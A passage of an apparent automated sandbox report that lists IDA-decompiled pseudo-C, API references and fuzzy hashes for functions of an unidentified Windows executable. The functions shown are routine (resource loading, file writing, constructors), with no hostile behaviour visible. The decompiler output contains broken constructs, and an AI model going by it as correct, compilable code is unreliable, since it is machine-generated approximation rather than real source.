				 *((intOrPtr*)(_t29 - 0x10)) = _t18;
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				if(_t18 == 0) {
					_t27 = 0;
				} else {
					_t27 = E0041875C(_t18,  *((intOrPtr*)(_t29 + 0x14)));
				}
				_push( *((intOrPtr*)(_t29 + 0x10)));
				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
				_push( *((intOrPtr*)(_t29 + 0xc)));
				_push( *((intOrPtr*)(_t29 + 8)));
				_t14 = L00417800(_t13, _t24, _t25);
				 *0x4553e4 = _t14;
				if(_t14 == 0) {
					_push(8);
					L0043DD54();
					 *_t14 = 2;
					 *((intOrPtr*)(_t14 + 4)) = _t27;
				} else {
					if(_t27 != 0) {
						E004187B7(_t27);
						_push(_t27);
						L0043DD42();
					}
					_t14 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
				return _t14;
			}

0x004186d9
0x004186d9
0x004186de
0x004186e3
0x004186e5
0x004186ea
0x004186f0
0x004186f2
0x004186f5
0x004186fb
0x00418709
0x004186fd
0x00418705
0x00418705
0x0041870b
0x0041870e
0x00418714
0x00418717
0x0041871a
0x00418721
0x00418726
0x0041873e
0x00418740
0x00418746
0x0041874c
0x00418728
0x0041872a
0x0041872e
0x00418733
0x00418734
0x00418739
0x0041873a
0x0041873a
0x00418753
0x0041875b

APIs

__EH_prolog.LIBCMT ref: 004186DE
#823.MFC42(00004098), ref: 004186EA
#825.MFC42(00000000), ref: 00418734

Part of subcall function 0041875C: strlen.MSVCRT ref: 00418798
Part of subcall function 0041875C: #823.MFC42(00000001,?,?,?,00418705,?), ref: 0041879F
Part of subcall function 0041875C: strcpy.MSVCRT(00000000,?,00000001,?,?,?,00418705,?), ref: 004187A8

#823.MFC42(00000008), ref: 00418740

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823$#825H_prologstrcpystrlen
String ID:
API String ID: 958000321-0
Opcode ID: cf39adff43fa431d499d8463744971d91b97bf3a91df3d13503021e226e0b4b3
Instruction ID: 817bb65b43c2c39b7008b0730998368d4a6c1540c41f2929a5e38aa6ac84cab7
Opcode Fuzzy Hash: cf39adff43fa431d499d8463744971d91b97bf3a91df3d13503021e226e0b4b3
Instruction Fuzzy Hash: 66012B31901210ABDB15AF65DD067EE7AA1EF48754F20821FF8259A2D1CF7C8D40C75D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4A1, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C4A1(intOrPtr __ecx) {
				intOrPtr _t46;
				void* _t51;

				E0043E4E0(0x43fd8e, _t51);
				_push(__ecx);
				_t46 =  *((intOrPtr*)(_t51 + 8));
				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t46 + 4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t46 + 8));
				_push(_t46 + 0xc);
				L0043DD3C();
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				_push(_t46 + 0x10);
				L0043DD3C();
				_push(_t46 + 0x14);
				 *(_t51 - 4) = 1;
				L0043DD3C();
				 *((intOrPtr*)(__ecx + 0x18)) =  *((intOrPtr*)(_t46 + 0x18));
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(_t46 + 0x1c));
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t46 + 0x20));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t46 + 0x24));
				 *((intOrPtr*)(__ecx + 0x28)) =  *((intOrPtr*)(_t46 + 0x28));
				 *((intOrPtr*)(__ecx)) = 0x4459f4;
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return __ecx;
			}

0x0040c4a6
0x0040c4ab
0x0040c4ae
0x0040c4b3
0x0040c4bc
0x0040c4c2
0x0040c4c8
0x0040c4c9
0x0040c4ce
0x0040c4d5
0x0040c4d9
0x0040c4e4
0x0040c4e5
0x0040c4e9
0x0040c4f4
0x0040c4fa
0x0040c500
0x0040c506
0x0040c50c
0x0040c50f
0x0040c519
0x0040c521

APIs

__EH_prolog.LIBCMT ref: 0040C4A6
#535.MFC42(?,00000001,?,?,0040C35C), ref: 0040C4C9
#535.MFC42(?,?,00000001,?,?,0040C35C), ref: 0040C4D9
#535.MFC42(?,?,?,00000001,?,?,0040C35C), ref: 0040C4E9

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #535$H_prolog
String ID:
API String ID: 3656073097-0
Opcode ID: dc0f7c126d016f76afa332e406b8e3508f5c4d19d10755abbb7a6b73e34e3b85
Instruction ID: e72cd9c46b4ef83a91252c0049fb78f556fd5944464f98d28d248562af3aff17
Opcode Fuzzy Hash: dc0f7c126d016f76afa332e406b8e3508f5c4d19d10755abbb7a6b73e34e3b85
Instruction Fuzzy Hash: 361195B5A00A46AFC724DF69D540A9AF7F4FB1C314B008A2EA49AC3B40E774F954CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9A7, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041C9A7(intOrPtr* __ecx, CHAR* _a4, CHAR* _a8) {
				void* _t12;
				signed int _t16;
				struct HRSRC__* _t19;
				signed int _t21;
				intOrPtr* _t22;

				_t22 = __ecx;
				_t19 = FindResourceA( *(__ecx + 4), _a4, _a8);
				if(_t19 == 0) {
					L3:
					return 0;
				}
				_t12 = LoadResource( *(_t22 + 4), _t19);
				if(_t12 == 0) {
					goto L3;
				}
				_t21 = LockResource(_t12);
				if(_t21 != 0) {
					_t16 =  *((intOrPtr*)(_t22 + 0x14))( *_t22, _a8, _a4,  *((intOrPtr*)(_t22 + 0xc)), _t21, SizeofResource( *(_t22 + 4), _t19));
					asm("sbb eax, eax");
					return  ~_t16 & _t21;
				}
				goto L3;
			}

0x0041c9aa
0x0041c9bd
0x0041c9c1
0x0041c9de
0x00000000
0x0041c9de
0x0041c9c7
0x0041c9cf
0x00000000
0x00000000
0x0041c9d8
0x0041c9dc
0x0041c9fd
0x0041ca02
0x00000000
0x0041ca04
0x00000000

APIs

FindResourceA.KERNEL32(000000FF,?,?), ref: 0041C9B7
LoadResource.KERNEL32(000000FF,00000000,?,00000000,0041C84A,MAINICON,0000000E), ref: 0041C9C7
LockResource.KERNEL32(00000000,?,00000000,0041C84A,MAINICON,0000000E), ref: 0041C9D2
SizeofResource.KERNEL32(000000FF,00000000,?,00000000,0041C84A,MAINICON,0000000E), ref: 0041C9E6

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 7dbe6ec9d1f40b1f841483d7f39943b6eee79a0ca206a847f4c59e4e63ddec48
Instruction ID: ce7c5e10deb391afe9709e2c3fd2b888c61de4399f1389f0c930167047dfacf7
Opcode Fuzzy Hash: 7dbe6ec9d1f40b1f841483d7f39943b6eee79a0ca206a847f4c59e4e63ddec48
Instruction Fuzzy Hash: 52F0AF7A240602EFDB224FA1DD48D67BAEEEF94B81710483AF696D1520DB21CC64DB74

Uniqueness

Uniqueness Score: -1.00%

Function 0041FFA7, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041FFA7(intOrPtr __ecx) {
				void* _t18;
				void* _t26;
				void* _t29;
				void* _t32;

				E0043E4E0(0x441e56, _t32);
				 *((intOrPtr*)(_t32 - 0x10)) = __ecx;
				L0043E45C();
				 *((intOrPtr*)(_t32 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x448f90;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				L0043E456();
				 *((intOrPtr*)(__ecx + 0x354)) = 0;
				 *((char*)(__ecx + 4)) = 1;
				 *((char*)(__ecx + 0x4e)) = 0;
				 *((char*)(__ecx + 0x152)) = 0;
				 *((char*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 1;
				__imp__time(__ecx + 0x10, 0, 0xc8, _t26, _t29, _t18, __ecx);
				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
				return __ecx;
			}

0x0041ffac
0x0041ffb7
0x0041ffc2
0x0041ffd1
0x0041ffd4
0x0041ffda
0x0041ffdd
0x0041ffe0
0x0041ffe8
0x0041ffef
0x0041fff3
0x0041fff6
0x0041fffc
0x0041ffff
0x00420006
0x00420015
0x0042001d

APIs

__EH_prolog.LIBCMT ref: 0041FFAC
#287.MFC42(?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFC2
#6139.MFC42(00000000,000000C8,?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFE0
time.MSVCRT ref: 00420006

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #287#6139H_prologtime
String ID:
API String ID: 3803556615-0
Opcode ID: bcf2162d7701519d6e61dbfcc2a4de1ebf57cfc4f64cc277cbcc54b4640eecfa
Instruction ID: 3cb7a4fcf702eff786f76d98b197b9bea49d4350c24df9cbff7fdebb40b8f99c
Opcode Fuzzy Hash: bcf2162d7701519d6e61dbfcc2a4de1ebf57cfc4f64cc277cbcc54b4640eecfa
Instruction Fuzzy Hash: 760162B1601B40DFD3219F5A884169AFBF9EBA9718F04896FE09A93681C7B46908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA9C, Relevance: 6.0, APIs: 4, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0042AA9C(CHAR* _a4, void* _a8, long _a12) {
				long _v8;
				int _t9;
				void* _t16;

				_t16 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t16 != 0xffffffff) {
					_t9 = WriteFile(_t16, _a8, _a12,  &_v8, 0);
					_push(_t16);
					if(_t9 != 0) {
						CloseHandle();
						E0042AAFA(_a4);
						_push(1);
						_pop(0);
					} else {
						CloseHandle();
						goto L3;
					}
				}
				return 0;
			}

0x0042aabc
0x0042aac1
0x0042aad0
0x0042aad8
0x0042aad9
0x0042aae5
0x0042aaee
0x0042aaf4
0x0042aaf6
0x0042aadb
0x0042aadb
0x00000000
0x0042aadb
0x0042aad9
0x0042aaf9

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0042AAB6
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042AAD0
CloseHandle.KERNEL32(00000000), ref: 0042AADB
CloseHandle.KERNEL32(00000000), ref: 0042AAE5

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CloseFileHandle$CreateWrite
String ID:
API String ID: 3602564925-0
Opcode ID: f171812dcc2484ee0f37501904cc352e713ca6273c130dc27d8762dbfe07246c
Instruction ID: 33a19ec37105ae79ac05880e22c8d458a6b0843173efb1d81737d5b05106d575
Opcode Fuzzy Hash: f171812dcc2484ee0f37501904cc352e713ca6273c130dc27d8762dbfe07246c
Instruction Fuzzy Hash: 20F05E36340224BFEB255B60ED0AF9A3A68EF45760F500121FF16A90E0D6F1A9A5C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040CABB, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040CABB(void* __ecx) {
				int _t8;
				struct HWND__* _t9;
				void* _t16;
				void* _t17;

				_t17 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
					L10:
					return _t8;
				}
				if( *((intOrPtr*)(__ecx + 0xc4)) == 0) {
					if(E0040CC69(_t8, __ecx) == 0) {
						L0043DE32();
					} else {
						_push(_t17 + 0x50);
						L0043E19E();
					}
				}
				_t16 = _t17 + 0x54;
				if(_t16 != 0) {
					_t9 =  *(_t16 + 0x20);
				} else {
					_t9 = 0;
				}
				_t8 = IsWindow(_t9);
				if(_t8 == 0) {
					goto L10;
				} else {
					_push(1);
					_push(_t17);
					_push( *((intOrPtr*)(_t17 + 0x50)));
					L0043E1A4();
					return _t8;
				}
			}

0x0040cabc
0x0040cac3
0x0040cb15
0x0040cb15
0x0040cb15
0x0040cacc
0x0040cad6
0x0040cae8
0x0040cad8
0x0040cadd
0x0040cade
0x0040cade
0x0040cad6
0x0040caed
0x0040caf2
0x0040caf8
0x0040caf4
0x0040caf4
0x0040caf4
0x0040cafc
0x0040cb04
0x00000000
0x0040cb06
0x0040cb06
0x0040cb08
0x0040cb09
0x0040cb0e
0x00000000
0x0040cb0e

APIs

#3874.MFC42(?), ref: 0040CADE
#2614.MFC42 ref: 0040CAE8
IsWindow.USER32(?), ref: 0040CAFC
#6358.MFC42(?,?,00000001), ref: 0040CB0E

Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2614#3797#3874#6358Window
String ID:
API String ID: 975445233-0
Opcode ID: 22e690afdaf62ca2f5a5a93fc6fc590069af4ecf50a6cb7f784d3df39ae40140
Instruction ID: 29b924dc3d14e5e94e06c4a31e8f699173732524636afe31b7bb9e88633efc79
Opcode Fuzzy Hash: 22e690afdaf62ca2f5a5a93fc6fc590069af4ecf50a6cb7f784d3df39ae40140
Instruction Fuzzy Hash: 05F06D30701714DBDA30D722E885B6777A8AF84354F000A3FE446A26C0DBBCE806DAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410018, Relevance: 6.0, APIs: 4, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 42%

			E00410018() {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t13;
				void* _t20;
				void* _t21;
				signed int _t22;

				_t21 = _t13;
				_t12 = E004101D6(_t21,  &_v8,  *( *(_t21 + 4)),  *(_t21 + 4));
				L0043DD42();
				 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				_t22 = 0;
				__imp__??0_Lockit@std@@QAE@XZ( *(_t21 + 4), _t20, _t13);
				 *0x4553c4 =  *0x4553c4 - 1;
				if( *0x4553c4 == 0) {
					_t22 =  *0x4553c0; // 0x2acaa0
					 *0x4553c0 =  *0x4553c0 & 0x00000000;
				}
				__imp__??1_Lockit@std@@QAE@XZ();
				if(_t22 != 0) {
					_push(_t22);
					L0043DD42();
				}
				return _t12;
			}

0x0041001d
0x0041002c
0x00410034
0x00410039
0x0041003d
0x00410042
0x00410047
0x0041004d
0x00410053
0x00410055
0x0041005b
0x0041005b
0x00410065
0x0041006d
0x0041006f
0x00410070
0x00410075
0x00410078

APIs

#825.MFC42(?,?,?,?), ref: 00410034
??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00410047
??1_Lockit@std@@QAE@XZ.MSVCP60(?,?), ref: 00410065
#825.MFC42(00000000,?,?), ref: 00410070

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #825Lockit@std@@$??0_??1_
String ID:
API String ID: 2095439190-0
Opcode ID: a9e1c3c70cc2f25adff21ca3c350dd2f5c5af8e5ed7366ed5c6dc88546f67dc3
Instruction ID: d80ef09a1bb9494872583306faddbe531f07663aa1ddb817dc9b5c5764e80c35
Opcode Fuzzy Hash: a9e1c3c70cc2f25adff21ca3c350dd2f5c5af8e5ed7366ed5c6dc88546f67dc3
Instruction Fuzzy Hash: 3FF0F632800B109FC724EB40EC06BAA77B8FF49716F01405DE806A7151DBB8BE40CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC4, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00419CC4(void* __ecx, void* __eflags) {
				void* _t23;
				void* _t34;
				void* _t36;

				E0043E4E0(0x4411fb, _t36);
				_t34 = __ecx;
				_push(0);
				E00427DE2(_t36 - 0x238);
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_push(E00429029(_t36 - 0x10, 0xe06e));
				 *(_t36 - 4) = 1;
				L0043DFCA();
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				L0043DD36();
				 *((intOrPtr*)(_t36 - 0x164)) =  *((intOrPtr*)(_t34 + 0x64));
				L0043DE7A();
				_t13 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
				_t23 = E00419D44(_t36 - 0x238,  *_t13);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t23;
			}

0x00419cc9
0x00419cd5
0x00419cd7
0x00419cdf
0x00419ce4
0x00419cf8
0x00419cff
0x00419d03
0x00419d08
0x00419d0f
0x00419d1d
0x00419d23
0x00419d28
0x00419d28
0x00419d32
0x00419d3b
0x00419d43

APIs

__EH_prolog.LIBCMT ref: 00419CC9

Part of subcall function 00427DE2: __EH_prolog.LIBCMT ref: 00427DE7
Part of subcall function 00427DE2: #324.MFC42(000000C7,?,?,?,00419CE4,00000000), ref: 00427DFB
Part of subcall function 00427DE2: #540.MFC42(000000C7,?,?,?,00419CE4,00000000), ref: 00427E16

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#858.MFC42(00000000,00000000), ref: 00419D03
#800.MFC42(00000000,00000000), ref: 00419D0F
#2514.MFC42(00000000,00000000), ref: 00419D23

Part of subcall function 00419D44: __EH_prolog.LIBCMT ref: 00419D49
Part of subcall function 00419D44: #800.MFC42(?,?,00419D37,00000000,00000000), ref: 00419D9E
Part of subcall function 00419D44: #641.MFC42(?,?,00419D37,00000000,00000000), ref: 00419DB5

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
